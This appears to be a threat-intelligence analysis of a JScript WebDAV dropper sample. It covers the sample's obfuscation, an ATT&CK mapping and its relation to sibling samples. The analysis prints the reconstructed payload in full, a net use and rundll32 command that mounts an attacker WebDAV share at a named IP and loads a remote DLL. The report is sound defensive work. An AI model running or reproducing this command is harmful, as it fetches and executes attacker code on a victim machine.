familyunclassified-js-webdav-dropperconfidencehighcreated2026-07-24
SHA-256: 93c5ae9a1385ed38ad9477d54640c83c3e19530f2762e395e7f771197d38a245

Build / RE

  • Language: JScript (Windows Script Host) ^[file.txt]
  • Obfuscation dialect: Pure-JScript dictionary lookup-table (62 entries, random noise keys, 2,976-character extreme variable-name padding). Object name suspect (divergence from typical random-noise object names). Assembly engine: Function('return this')()[suspect['key1']+suspect['key2']+...](payload_expr). ^[strings.txt:1]
  • Payload reconstruction: cmd /c net use \\94.159.113.86:8888\DavWWWRoot & rundll32 \\94.159.113.86:8888\DavWWWRoot\9643213531477.dll,Entry ^[strings.txt:378951]
  • Anti-analysis: None — no debugger checks, no VM detection, no time-bombs, no connectivity checks, no sandbox gate.
  • Code quality: Low — hand-written, verbose, repetitive. No commercial obfuscator signatures.
  • Notable: The 2,976-character variable name is the only identifier in the script body before the suspect=[]; dictionary declaration. The dictionary object is named suspect rather than a random noise string (first observed naming divergence in the 101-sibling family).

Deploy / ATT&CK

Tactic Technique Evidence
Execution T1059.005 (Visual Basic / JScript) .js file opened by user; WScript engine executes JScript ^[file.txt]
Execution T1218.011 (Rundll32) rundll32 \\94.159.113.86:8888\DavWWWRoot\9643213531477.dll,Entry ^[strings.txt:378951]
Defense Evasion T1218 (System Binary Proxy Execution) rundll32 is a signed system binary; remote DLL loaded over WebDAV UNC path ^[strings.txt:378951]
Defense Evasion T1027 (Obfuscated Files or Information) 62-entry noise-key dictionary + 2,976-char variable-name padding ^[strings.txt:1]
Command & Control T1071.001 (Web Protocols) WebDAV over HTTP (\\94.159.113.86:8888\DavWWWRoot) ^[strings.txt:378951]
Command & Control T1105 (Ingress Tool Transfer) net use mounts WebDAV share; rundll32 fetches and loads remote DLL ^[strings.txt:378951]

Family Context

101st confirmed sibling of the unclassified-js-webdav-dropper family. Shares C2 IP 94.159.113.86:8888 with siblings f2316aaf (87th), f346e80d (88th), 77aff542 (91st), and 86140a690cfd (95th). All five use rundll32 ...,Entry execution rather than regsvr32 /s. This sample is the sixth sibling on .86 and confirms sustained activity on this endpoint.

Divergences from prior siblings:

  • Object name suspect instead of random noise string (first in family)
  • 2,976-char variable name (within extreme-padding family but not record-holder)
  • No PowerShell wrapper, no wordpad decoy, no timeout gate, no batch/polyglot layer — minimal footprint

Static-only analysis; CAPE skipped detonation because file type is ASCII text, not a supported binary class. ^[dynamic-analysis.md]